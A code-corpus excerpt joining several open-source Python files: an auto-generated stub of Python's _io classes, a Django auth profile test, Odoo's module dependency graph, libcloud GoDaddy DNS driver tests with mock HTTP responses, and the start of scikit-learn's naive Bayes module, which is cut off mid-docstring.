readlines([size]) -> list of strings, each a line from the file.
Call readline() repeatedly and return a list of the lines so read.
The optional size argument, if given, is an approximate bound on the
total number of bytes in the lines returned.
"""
return []
def seek(self, pos, whence=0): # real signature unknown; restored from __doc__
"""
seek(pos, whence=0) -> int. Change stream position.
Seek to byte offset pos relative to position indicated by whence:
0 Start of stream (the default). pos should be >= 0;
1 Current position - pos may be negative;
2 End of stream - pos usually negative.
Returns the new absolute position.
"""
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self): # real signature unknown; restored from __doc__
""" tell() -> current file position, an integer """
pass
def truncate(self, size=None): # real signature unknown; restored from __doc__
"""
truncate([size]) -> int. Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().
The current file position is unchanged. Returns the new size.
"""
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, bytes): # real signature unknown; restored from __doc__
"""
write(bytes) -> int. Write bytes to file.
Return the number of bytes written.
"""
pass
def writelines(self, sequence_of_strings): # real signature unknown; restored from __doc__
"""
writelines(sequence_of_strings) -> None. Write strings to the file.
Note that newlines are not added. The sequence can be any iterable
object producing strings. This is equivalent to calling write() for
each string.
"""
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, buffer=None): # real signature unknown; restored from __doc__
pass
def __iter__(self): # real signature unknown; restored from __doc__
""" x.__iter__() <==> iter(x) """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
closed = property(lambda self: object()) # default
class _RawIOBase(_IOBase):
""" Base class for raw binary I/O. """
def read(self, *args, **kwargs): # real signature unknown
pass
def readall(self, *args, **kwargs): # real signature unknown
""" Read until EOF, using multiple read() call. """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
class FileIO(_RawIOBase):
"""
file(name: str[, mode: str]) -> file IO object
Open a file. The mode can be 'r', 'w' or 'a' for reading (default),
writing or appending. The file will be created if it doesn't exist
when opened for writing or appending; it will be truncated when
opened for writing. Add a '+' to the mode to allow simultaneous
reading and writing.
"""
def close(self): # real signature unknown; restored from __doc__
"""
close() -> None. Close the file.
A closed file cannot be used for further I/O operations. close() may be
called more than once without error. Changes the fileno to -1.
"""
pass
def fileno(self): # real signature unknown; restored from __doc__
"""
fileno() -> int. "file descriptor".
This is needed for lower-level file interfaces, such the fcntl module.
"""
pass
def isatty(self): # real signature unknown; restored from __doc__
""" isatty() -> bool. True if the file is connected to a tty device. """
pass
def read(self, size=-1): # known case of _io.FileIO.read
"""
read(size: int) -> bytes. read at most size bytes, returned as bytes.
Only makes one system call, so less data may be returned than requested
In non-blocking mode, returns None if no data is available.
On end-of-file, returns ''.
"""
return ""
def readable(self): # real signature unknown; restored from __doc__
""" readable() -> bool. True if file was opened in a read mode. """
pass
def readall(self): # real signature unknown; restored from __doc__
"""
readall() -> bytes. read all data from the file, returned as bytes.
In non-blocking mode, returns as much as is immediately available,
or None if no data is available. On end-of-file, returns ''.
"""
pass
def readinto(self): # real signature unknown; restored from __doc__
""" readinto() -> Same as RawIOBase.readinto(). """
pass
def seek(self, offset, whence=None): # real signature unknown; restored from __doc__
"""
seek(offset: int[, whence: int]) -> None. Move to new file position.
Argument offset is a byte count. Optional argument whence defaults to
0 (offset from start of file, offset should be >= 0); other values are 1
(move relative to current position, positive or negative), and 2 (move
relative to end of file, usually negative, although many platforms allow
seeking beyond the end of a file).
Note that not all file objects are seekable.
"""
pass
def seekable(self): # real signature unknown; restored from __doc__
""" seekable() -> bool. True if file supports random-access. """
pass
def tell(self): # real signature unknown; restored from __doc__
""" tell() -> int. Current file position """
pass
def truncate(self, size=None): # real signature unknown; restored from __doc__
"""
truncate([size: int]) -> None. Truncate the file to at most size bytes.
Size defaults to the current file position, as returned by tell().The current file position is changed to the value of size.
"""
pass
def writable(self): # real signature unknown; restored from __doc__
""" writable() -> bool. True if file was opened in a write mode. """
pass
def write(self, b): # real signature unknown; restored from __doc__
"""
write(b: bytes) -> int. Write bytes b to file, return number written.
Only makes one system call, so not all of the data may be written.
The number of bytes actually written is returned.
"""
pass
def _dealloc_warn(self, *args, **kwargs): # real signature unknown
pass
def __getattribute__(self, name): # real signature unknown; restored from __doc__
""" x.__getattribute__('name') <==> x.name """
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object()) # default
closefd = property(lambda self: object()) # default
mode = property(lambda self: object()) # default
class IncrementalNewlineDecoder(object):
"""
Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece. When used with decoder=None, it expects unicode strings as
decode input and translates newlines without first invoking an external
decoder.
"""
def decode(self, *args, **kwargs): # real signature unknown
pass
def getstate(self, *args, **kwargs): # real signature unknown
pass
def reset(self, *args, **kwargs): # real signature unknown
pass
def setstate(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
newlines = property(lambda self: object()) # default
class _TextIOBase(_IOBase):
"""
Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no readinto method because Python's character strings
are immutable. There is no public constructor.
"""
def detach(self, *args, **kwargs): # real signature unknown
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
pass
def read(self, *args, **kwargs): # real signature unknown
"""
Read at most n characters from stream.
Read from underlying buffer until we have n characters or we hit EOF.
If n is negative or omitted, read until EOF.
"""
pass
def readline(self, *args, **kwargs): # real signature unknown
"""
Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
pass
def write(self, *args, **kwargs): # real signature unknown
"""
Write string to stream.
Returns the number of characters written (which is always equal to
the length of the string).
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
encoding = property(lambda self: object()) # default
errors = property(lambda self: object()) # default
newlines = property(lambda self: object()) # default
class StringIO(_TextIOBase):
"""
Text I/O implementation using an in-memory buffer.
The initial_value argument sets the value of object. The newline
argument is like the one of TextIOWrapper's constructor.
"""
def close(self, *args, **kwargs): # real signature unknown
"""
Close the IO object. Attempting any further operation after the
object is closed will raise a ValueError.
This method has no effect if the file is already closed.
"""
pass
def getvalue(self, *args, **kwargs): # real signature unknown
""" Retrieve the entire contents of the object. """
pass
def read(self, *args, **kwargs): # real signature unknown
"""
Read at most n characters, returned as a string.
If the argument is negative or omitted, read until EOF
is reached. Return an empty string at EOF.
"""
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
"""
Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
pass
def seek(self, *args, **kwargs): # real signature unknown
"""
Change stream position.
Seek to character offset pos relative to position indicated by whence:
0 Start of stream (the default). pos should be >= 0;
1 Current position - pos must be 0;
2 End of stream - pos must be 0.
Returns the new absolute position.
"""
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
""" Tell the current file position. """
pass
def truncate(self, *args, **kwargs): # real signature unknown
"""
Truncate size to pos.
The pos argument defaults to the current file position, as
returned by tell(). The current file position is unchanged.
Returns the new absolute position.
"""
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
"""
Write string to file.
Returns the number of characters written, which is always equal to
the length of the string.
"""
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
closed = property(lambda self: object()) # default
line_buffering = property(lambda self: object()) # default
newlines = property(lambda self: object()) # default
class TextIOWrapper(_TextIOBase):
"""
Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding.
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
enabled. With this enabled, on input, the lines endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line seperator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
def close(self, *args, **kwargs): # real signature unknown
pass
def detach(self, *args, **kwargs): # real signature unknown
pass
def fileno(self, *args, **kwargs): # real signature unknown
pass
def flush(self, *args, **kwargs): # real signature unknown
pass
def isatty(self, *args, **kwargs): # real signature unknown
pass
def read(self, *args, **kwargs): # real signature unknown
pass
def readable(self, *args, **kwargs): # real signature unknown
pass
def readline(self, *args, **kwargs): # real signature unknown
pass
def seek(self, *args, **kwargs): # real signature unknown
pass
def seekable(self, *args, **kwargs): # real signature unknown
pass
def tell(self, *args, **kwargs): # real signature unknown
pass
def truncate(self, *args, **kwargs): # real signature unknown
pass
def writable(self, *args, **kwargs): # real signature unknown
pass
def write(self, *args, **kwargs): # real signature unknown
pass
def __getstate__(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __next__(self): # real signature unknown; restored from __doc__
""" x.__next__() <==> next(x) """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
buffer = property(lambda self: object()) # default
closed = property(lambda self: object()) # default
encoding = property(lambda self: object()) # default
errors = property(lambda self: object()) # default
line_buffering = property(lambda self: object()) # default
name = property(lambda self: object()) # default
newlines = property(lambda self: object()) # default
_CHUNK_SIZE = property(lambda self: object()) # default
class UnsupportedOperation(ValueError, IOError):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object()) # default
| apache-2.0 |
beezee/GAE-Django-site | django/contrib/auth/tests/models.py | 318 | 1493 | from django.conf import settings
from django.test import TestCase
from django.contrib.auth.models import User, SiteProfileNotAvailable
class ProfileTestCase(TestCase):
fixtures = ['authtestdata.json']
def setUp(self):
"""Backs up the AUTH_PROFILE_MODULE"""
self.old_AUTH_PROFILE_MODULE = getattr(settings,
'AUTH_PROFILE_MODULE', None)
def tearDown(self):
"""Restores the AUTH_PROFILE_MODULE -- if it was not set it is deleted,
otherwise the old value is restored"""
if self.old_AUTH_PROFILE_MODULE is None and \
hasattr(settings, 'AUTH_PROFILE_MODULE'):
del settings.AUTH_PROFILE_MODULE
if self.old_AUTH_PROFILE_MODULE is not None:
settings.AUTH_PROFILE_MODULE = self.old_AUTH_PROFILE_MODULE
def test_site_profile_not_available(self):
# calling get_profile without AUTH_PROFILE_MODULE set
if hasattr(settings, 'AUTH_PROFILE_MODULE'):
del settings.AUTH_PROFILE_MODULE
user = User.objects.get(username='testclient')
self.assertRaises(SiteProfileNotAvailable, user.get_profile)
# Bad syntax in AUTH_PROFILE_MODULE:
settings.AUTH_PROFILE_MODULE = 'foobar'
self.assertRaises(SiteProfileNotAvailable, user.get_profile)
# module that doesn't exist
settings.AUTH_PROFILE_MODULE = 'foo.bar'
self.assertRaises(SiteProfileNotAvailable, user.get_profile)
| bsd-3-clause |
rubencabrera/odoo | openerp/modules/graph.py | 260 | 7763 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2014 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Modules dependency graph. """
import os, sys, imp
from os.path import join as opj
import itertools
import zipimport
import openerp
import openerp.osv as osv
import openerp.tools as tools
import openerp.tools.osutil as osutil
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
import zipfile
import openerp.release as release
import re
import base64
from zipfile import PyZipFile, ZIP_DEFLATED
from cStringIO import StringIO
import logging
_logger = logging.getLogger(__name__)
class Graph(dict):
""" Modules dependency graph.
The graph is a mapping from module name to Nodes.
"""
def add_node(self, name, info):
max_depth, father = 0, None
for d in info['depends']:
n = self.get(d) or Node(d, self, None) # lazy creation, do not use default value for get()
if n.depth >= max_depth:
father = n
max_depth = n.depth
if father:
return father.add_child(name, info)
else:
return Node(name, self, info)
def update_from_db(self, cr):
if not len(self):
return
# update the graph with values from the database (if exist)
## First, we set the default values for each package in graph
additional_data = dict((key, {'id': 0, 'state': 'uninstalled', 'dbdemo': False, 'installed_version': None}) for key in self.keys())
## Then we get the values from the database
cr.execute('SELECT name, id, state, demo AS dbdemo, latest_version AS installed_version'
' FROM ir_module_module'
' WHERE name IN %s',(tuple(additional_data),)
)
## and we update the default values with values from the database
additional_data.update((x['name'], x) for x in cr.dictfetchall())
for package in self.values():
for k, v in additional_data[package.name].items():
setattr(package, k, v)
def add_module(self, cr, module, force=None):
self.add_modules(cr, [module], force)
def add_modules(self, cr, module_list, force=None):
if force is None:
force = []
packages = []
len_graph = len(self)
for module in module_list:
# This will raise an exception if no/unreadable descriptor file.
# NOTE The call to load_information_from_description_file is already
# done by db.initialize, so it is possible to not do it again here.
info = openerp.modules.module.load_information_from_description_file(module)
if info and info['installable']:
packages.append((module, info)) # TODO directly a dict, like in get_modules_with_version
else:
_logger.warning('module %s: not installable, skipped', module)
dependencies = dict([(p, info['depends']) for p, info in packages])
current, later = set([p for p, info in packages]), set()
while packages and current > later:
package, info = packages[0]
deps = info['depends']
# if all dependencies of 'package' are already in the graph, add 'package' in the graph
if reduce(lambda x, y: x and y in self, deps, True):
if not package in current:
packages.pop(0)
continue
later.clear()
current.remove(package)
node = self.add_node(package, info)
for kind in ('init', 'demo', 'update'):
if package in tools.config[kind] or 'all' in tools.config[kind] or kind in force:
setattr(node, kind, True)
else:
later.add(package)
packages.append((package, info))
packages.pop(0)
self.update_from_db(cr)
for package in later:
unmet_deps = filter(lambda p: p not in self, dependencies[package])
_logger.error('module %s: Unmet dependencies: %s', package, ', '.join(unmet_deps))
result = len(self) - len_graph
if result != len(module_list):
_logger.warning('Some modules were not loaded.')
return result
def __iter__(self):
level = 0
done = set(self.keys())
while done:
level_modules = sorted((name, module) for name, module in self.items() if module.depth==level)
for name, module in level_modules:
done.remove(name)
yield module
level += 1
def __str__(self):
return '\n'.join(str(n) for n in self if n.depth == 0)
class Node(object):
""" One module in the modules dependency graph.
Node acts as a per-module singleton. A node is constructed via
Graph.add_module() or Graph.add_modules(). Some of its fields are from
ir_module_module (setted by Graph.update_from_db()).
"""
def __new__(cls, name, graph, info):
if name in graph:
inst = graph[name]
else:
inst = object.__new__(cls)
graph[name] = inst
return inst
def __init__(self, name, graph, info):
self.name = name
self.graph = graph
self.info = info or getattr(self, 'info', {})
if not hasattr(self, 'children'):
self.children = []
if not hasattr(self, 'depth'):
self.depth = 0
@property
def data(self):
return self.info
def add_child(self, name, info):
node = Node(name, self.graph, info)
node.depth = self.depth + 1
if node not in self.children:
self.children.append(node)
for attr in ('init', 'update', 'demo'):
if hasattr(self, attr):
setattr(node, attr, True)
self.children.sort(lambda x, y: cmp(x.name, y.name))
return node
def __setattr__(self, name, value):
super(Node, self).__setattr__(name, value)
if name in ('init', 'update', 'demo'):
tools.config[name][self.name] = 1
for child in self.children:
setattr(child, name, value)
if name == 'depth':
for child in self.children:
setattr(child, name, value + 1)
def __iter__(self):
return itertools.chain(iter(self.children), *map(iter, self.children))
def __str__(self):
return self._pprint()
def _pprint(self, depth=0):
s = '%s\n' % self.name
for c in self.children:
s += '%s`-> %s' % (' ' * depth, c._pprint(depth+1))
return s
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mistio/libcloud | libcloud/test/dns/test_godaddy.py | 18 | 7260 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
from libcloud.utils.py3 import httplib
from libcloud.dns.drivers.godaddy import GoDaddyDNSDriver
from libcloud.test import MockHttp
from libcloud.test.file_fixtures import DNSFileFixtures
from libcloud.test.secrets import DNS_PARAMS_GODADDY
from libcloud.dns.base import Zone, RecordType
class GoDaddyTests(unittest.TestCase):
def setUp(self):
GoDaddyMockHttp.type = None
GoDaddyDNSDriver.connectionCls.conn_class = GoDaddyMockHttp
self.driver = GoDaddyDNSDriver(*DNS_PARAMS_GODADDY)
def assertHasKeys(self, dictionary, keys):
for key in keys:
self.assertTrue(key in dictionary, 'key "%s" not in dictionary' %
(key))
def test_list_zones(self):
zones = self.driver.list_zones()
self.assertEqual(len(zones), 5)
self.assertEqual(zones[0].id, '177184419')
self.assertEqual(zones[0].domain, 'aperture-platform.com')
def test_ex_check_availability(self):
check = self.driver.ex_check_availability("wazzlewobbleflooble.com")
self.assertEqual(check.available, True)
self.assertEqual(check.price, 14.99)
def test_ex_list_tlds(self):
tlds = self.driver.ex_list_tlds()
self.assertEqual(len(tlds), 331)
self.assertEqual(tlds[0].name, 'academy')
self.assertEqual(tlds[0].type, 'GENERIC')
def test_ex_get_purchase_schema(self):
schema = self.driver.ex_get_purchase_schema('com')
self.assertEqual(schema['id'],
'https://api.godaddy.com/DomainPurchase#')
def test_ex_get_agreements(self):
ags = self.driver.ex_get_agreements('com')
self.assertEqual(len(ags), 1)
self.assertEqual(ags[0].title, 'Domain Name Registration Agreement')
def test_ex_purchase_domain(self):
fixtures = DNSFileFixtures('godaddy')
document = fixtures.load('purchase_request.json')
order = self.driver.ex_purchase_domain(document)
self.assertEqual(order.order_id, 1)
def test_list_records(self):
zone = Zone(id='177184419',
domain='aperture-platform.com',
type='master',
ttl=None,
driver=self.driver)
records = self.driver.list_records(zone)
self.assertEqual(len(records), 14)
self.assertEqual(records[0].type, RecordType.A)
self.assertEqual(records[0].name, '@')
self.assertEqual(records[0].data, '50.63.202.42')
self.assertEqual(records[0].id, '@:A')
def test_get_record(self):
record = self.driver.get_record(
'aperture-platform.com',
'www:A')
self.assertEqual(record.id, 'www:A')
self.assertEqual(record.name, 'www')
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, '50.63.202.42')
def test_create_record(self):
zone = Zone(id='177184419',
domain='aperture-platform.com',
type='master',
ttl=None,
driver=self.driver)
record = self.driver.create_record(
zone=zone,
name='www',
type=RecordType.A,
data='50.63.202.42'
)
self.assertEqual(record.id, 'www:A')
self.assertEqual(record.name, 'www')
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, '50.63.202.42')
def test_update_record(self):
record = self.driver.get_record(
'aperture-platform.com',
'www:A')
record = self.driver.update_record(
record=record,
name='www',
type=RecordType.A,
data='50.63.202.22'
)
self.assertEqual(record.id, 'www:A')
self.assertEqual(record.name, 'www')
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, '50.63.202.22')
def test_get_zone(self):
zone = self.driver.get_zone('aperture-platform.com')
self.assertEqual(zone.id, '177184419')
self.assertEqual(zone.domain, 'aperture-platform.com')
def test_delete_zone(self):
zone = Zone(id='177184419',
domain='aperture-platform.com',
type='master',
ttl=None,
driver=self.driver)
self.driver.delete_zone(zone)
class GoDaddyMockHttp(MockHttp):
fixtures = DNSFileFixtures('godaddy')
def _v1_domains(self, method, url, body, headers):
body = self.fixtures.load('v1_domains.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_aperture_platform_com(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_aperture_platform_com.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_aperture_platform_com_records(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_aperture_platform_com_records.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_available(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_available.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_tlds(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_tlds.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_aperture_platform_com_records_A_www(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_aperture_platform_com_records_A_www.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_purchase_schema_com(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_purchase_schema_com.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_agreements(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_agreements.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _v1_domains_purchase(self, method, url, body, headers):
body = self.fixtures.load('v1_domains_purchase.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 |
samzhang111/scikit-learn | sklearn/naive_bayes.py | 11 | 28770 | # -*- coding: utf-8 -*-
"""
The :mod:`sklearn.naive_bayes` module implements Naive Bayes algorithms. These
are supervised learning methods based on applying Bayes' theorem with strong
(naive) feature independence assumptions.
"""
# Author: Vincent Michel <vincent.michel@inria.fr>
# Minor fixes by Fabian Pedregosa
# Amit Aides <amitibo@tx.technion.ac.il>
# Yehuda Finkelstein <yehudaf@tx.technion.ac.il>
# Lars Buitinck <L.J.Buitinck@uva.nl>
# Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
# (parts based on earlier work by Mathieu Blondel)
#
# License: BSD 3 clause
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from .base import BaseEstimator, ClassifierMixin
from .preprocessing import binarize
from .preprocessing import LabelBinarizer
from .preprocessing import label_binarize
from .utils import check_X_y, check_array
from .utils.extmath import safe_sparse_dot, logsumexp
from .utils.multiclass import _check_partial_fit_first_call
from .utils.fixes import in1d
from .utils.validation import check_is_fitted
from .externals import six
__all__ = ['BernoulliNB', 'GaussianNB', 'MultinomialNB']
class BaseNB(six.with_metaclass(ABCMeta, BaseEstimator, ClassifierMixin)):
"""Abstract base class for naive Bayes estimators"""
@abstractmethod
def _joint_log_likelihood(self, X):
"""Compute the unnormalized posterior log probability of X
I.e. ``log P(c) + log P(x|c)`` for all rows x of X, as an array-like of
shape [n_classes, n_samples].
Input is passed to _joint_log_likelihood as-is by predict,
predict_proba and predict_log_proba.
"""
def predict(self, X):
"""
Perform classification on an array of test vectors X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
Predicted target values for X
"""
jll = self._joint_log_likelihood(X)
return self.classes_[np.argmax(jll, axis=1)]
def predict_log_proba(self, X):
"""
Return log-probability estimates for the test vector X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array-like, shape = [n_samples, n_classes]
Returns the log-probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
"""
jll = self._joint_log_likelihood(X)
# normalize by P(x) = P(f_1, ..., f_n)
log_prob_x = logsumexp(jll, axis=1)
return jll - np.atleast_2d(log_prob_x).T
def predict_proba(self, X):
"""
Return probability estimates for the test vector X.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array-like, shape = [n_samples, n_classes]
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute `classes_`.
"""
return np.exp(self.predict_log_proba(X))
class GaussianNB(BaseNB):
"""
Gaussian Naive Bayes (GaussianNB)
Can perform online updates to model parameters via `partial_fit` method.
For details on algorithm used to update feature means and variance online,
see Stanford CS tech report STAN-CS-79-773 by Chan, Golub, and LeVeque:
http://i.stanford.edu/pub/cstr/reports/cs/tr/79/773/CS-TR-79-773.pdf
Read more in the :ref:`User Guide <gaussian_naive_bayes>`.
Attributes
----------
class_prior_ : array, shape (n_classes,)
probability of each class.
class_count_ : array, shape (n_classes,)
number of training samples observed in each class.
theta_ : array, shape (n_classes, n_features)
mean of each feature per class
sigma_ : array, shape (n_classes, n_features)
variance of each feature per class
Examples
--------
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> Y = np.array([1, 1, 1, 2, 2, 2])
>>> from sklearn.naive_bayes import GaussianNB
>>> clf = GaussianNB()
>>> clf.fit(X, Y)
GaussianNB()
>>> print(clf.predict([[-0.8, -1]]))
[1]
>>> clf_pf = GaussianNB()
>>> clf_pf.partial_fit(X, Y, np.unique(Y))
GaussianNB()
>>> print(clf_pf.predict([[-0.8, -1]]))
[1]
"""
def fit(self, X, y, sample_weight=None):
"""Fit Gaussian Naive Bayes according to X, y
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape (n_samples,)
Target values.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
X, y = check_X_y(X, y)
return self._partial_fit(X, y, np.unique(y), _refit=True,
sample_weight=sample_weight)
@staticmethod
def _update_mean_variance(n_past, mu, var, X, sample_weight=None):
"""Compute online update of Gaussian mean and variance.
Given starting sample count, mean, and variance, a new set of
points X, and optionally sample weights, return the updated mean and
variance. (NB - each dimension (column) in X is treated as independent
-- you get variance, not covariance).
Can take scalar mean and variance, or vector mean and variance to
simultaneously update a number of independent Gaussians.
See Stanford CS tech report STAN-CS-79-773 by Chan, Golub, and LeVeque:
http://i.stanford.edu/pub/cstr/reports/cs/tr/79/773/CS-TR-79-773.pdf
Parameters
----------
n_past : int
Number of samples represented in old mean and variance. If sample
weights were given, this should contain the sum of sample
weights represented in old mean and variance.
mu : array-like, shape (number of Gaussians,)
Means for Gaussians in original set.
var : array-like, shape (number of Gaussians,)
Variances for Gaussians in original set.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
total_mu : array-like, shape (number of Gaussians,)
Updated mean for each Gaussian over the combined set.
total_var : array-like, shape (number of Gaussians,)
Updated variance for each Gaussian over the combined set.
"""
if X.shape[0] == 0:
return mu, var
# Compute (potentially weighted) mean and variance of new datapoints
if sample_weight is not None:
n_new = float(sample_weight.sum())
new_mu = np.average(X, axis=0, weights=sample_weight / n_new)
new_var = np.average((X - new_mu) ** 2, axis=0,
weights=sample_weight / n_new)
else:
n_new = X.shape[0]
new_var = np.var(X, axis=0)
new_mu = np.mean(X, axis=0)
if n_past == 0:
return new_mu, new_var
n_total = float(n_past + n_new)
# Combine mean of old and new data, taking into consideration
# (weighted) number of observations
total_mu = (n_new * new_mu + n_past * mu) / n_total
# Combine variance of old and new data, taking into consideration
# (weighted) number of observations. This is achieved by combining
# the sum-of-squared-differences (ssd)
old_ssd = n_past * var
new_ssd = n_new * new_var
total_ssd = (old_ssd + new_ssd +
(n_past / float(n_new * n_total)) *
(n_new * mu - n_new * new_mu) ** 2)
total_var = total_ssd / n_total
return total_mu, total_var
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Incremental fit on a batch of samples.
This method is expected to be called several times consecutively
on different chunks of a dataset so as to implement out-of-core
or online learning.
This is especially useful when the whole dataset is too big to fit in
memory at once.
This method has some performance and numerical stability overhead,
hence it is better to call partial_fit on chunks of data that are
as large as possible (as long as fitting in the memory budget) to
hide the overhead.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target values.
classes : array-like, shape (n_classes,)
List of all the classes that can possibly appear in the y vector.
Must be provided at the first call to partial_fit, can be omitted
in subsequent calls.
sample_weight : array-like, shape (n_samples,), optional
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : object
Returns self.
"""
return self._partial_fit(X, y, classes, _refit=False,
sample_weight=sample_weight)
def _partial_fit(self, X, y, classes=None, _refit=False,
sample_weight=None):
"""Actual implementation of Gaussian NB fitting.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples,)
Target values.
classes : array-like, shape (n_classes,)
List of all the classes that can possibly appear in the y vector.
